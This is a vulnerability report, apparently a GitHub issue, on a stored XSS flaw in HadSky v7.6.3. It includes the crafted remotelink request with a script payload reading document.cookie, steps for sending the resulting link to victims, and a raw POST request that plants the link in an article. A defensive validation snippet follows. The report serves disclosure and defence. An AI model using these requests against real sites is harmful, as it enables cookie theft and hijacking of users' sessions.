HadSky v7.6.3 has a Stored Cross-site Scripting (XSS) Vulnerability #30

Hebing123 opened this issue Mar 27, 2024 · 0 comments

Hebing123 commented Mar 27, 2024

Summary

HadSky v7.6.3 has been found to have a stored XSS vulnerability. This issue occurs because the application fails to properly sanitize input passed via the 'url' parameter to the 'remotelink' function.

Details

An attacker can exploit this weakness via a crafted HTTP request like so: https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=remotelink&url=%0d</script><script>alert(document.cookie)</script>
This request results in a link ID generation (for instance, ID = 36).
The attacker can then lure a user to visit this link: https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=download&id=36.
The interesting thing about this vulnerability is that we can cause the Location header to disappear by adding %0d to the payload; otherwise this would be an unexploitable vulnerability, because the HTML code would not be executed during the redirect.

The root cause is the lack of input sanitization in the 'remotelink' script, specifically the absence of any filtering on the 'url' parameter.

Proof of Concept (POC)

1. Send the following GET request to the target server:
   https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=remotelink&url=%0d</script><script>alert(document.cookie)</script>
2. Obtain the generated link ID and craft a new link:
   https://your-ip/index.php?c=app&a=puyuetianeditor:index&s=download&id=[OBTAINED_ID]
3. Distribute the crafted link; the XSS payload executes when a user visits it.

Since HadSky considers the embed tag to be a secure tag, we can even exploit this stored XSS vulnerability to trigger it in an article.

POST /index.php?c=post&type=read&id=&return=json&chkcsrfval=90f44b92b531f00d0fef7dc65308769a HTTP/1.1
Host: 192.168.160.154:177
Content-Length: 373
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.160.154:177/index.php?c=edit&type=read&sortid=0
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:  PHPSESSID=pbp0r55v7bhi2gban2v1s86knj;
Connection: close

_webos=HadSky&chkcsrfval=90f44b92b531f00d0fef7dc65308769a&sortid=1&label=&titlecolor=&title=at&content=awt<embed%20src="http://192.168.160.154:177/index.php?c=app%26a=puyuetianeditor:index%26s=download%26id=36">&PytMainContent2=&PytVideoAutoplay=&PytVideoBorder=1&PytVideoWidth=&PytVideoHeight=&PytMusicAutoplay=&PytMusicLoop=&readlevel=0&top=&high=&locked=&replyafterlook=


Impact

This vulnerability allows an attacker to execute arbitrary HTML and script in the context of the victim's browser session. The script could be used to steal user credentials, perform actions on the user's behalf, or even deface the website, depending on what the payload contains. The severity of this vulnerability is high, given that it permits a complete bypass of standard security measures.
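
As a defender-side illustration (added here; this is not HadSky's code), the check a 'remotelink'/'download'-style handler could apply to the 'url' parameter: reject control characters such as the CR the report relies on, require an absolute http(s) URL, and HTML-escape the value in the fallback body so the page is inert even when no Location header is sent. The function names and response shape are assumptions.

```python
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit
import html

# Bytes 0x00-0x1F and 0x7F. CR/LF here are what lets the %0d in the report
# break the Location header and fall through to the HTML body.
CONTROL_CHARS = {chr(c) for c in range(0x20)} | {chr(0x7F)}
# Characters that would let a stored value break out of an attribute or
# <script> context if a template later forgets to escape it.
MARKUP_CHARS = set('<>"\'`')


def validate_remote_url(raw: Optional[str]) -> Optional[str]:
    """Return raw if it is a clean absolute http(s) URL, otherwise None.

    Hypothetical check for a 'remotelink'-style handler: applied to the 'url'
    parameter before it is stored or echoed anywhere.
    """
    if not raw or any(ch in CONTROL_CHARS for ch in raw):
        return None
    if any(ch in MARKUP_CHARS for ch in raw):
        return None
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return raw


def build_download_response(stored_url: str) -> Tuple[Dict[str, str], str]:
    """Headers and fallback body for a 'download'-style redirect endpoint.

    The URL is re-validated on the way out and HTML-escaped in the body, so
    the page stays inert even if the Location header is not honoured.
    """
    headers = {"Content-Type": "text/html; charset=utf-8"}
    safe = validate_remote_url(stored_url)
    if safe is None:
        return headers, "<p>Invalid or missing link.</p>"
    headers["Location"] = safe
    escaped = html.escape(safe, quote=True)
    return headers, f'<p>Redirecting to <a href="{escaped}">{escaped}</a></p>'


if __name__ == "__main__":
    # Constructed inputs: the report's payload, a benign link, a non-http scheme.
    for candidate in ("\r</script><script>alert(document.cookie)</script>",
                      "https://example.com/files/report.pdf",
                      "javascript:alert(1)"):
        print(repr(candidate), "->", validate_remote_url(candidate))
```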
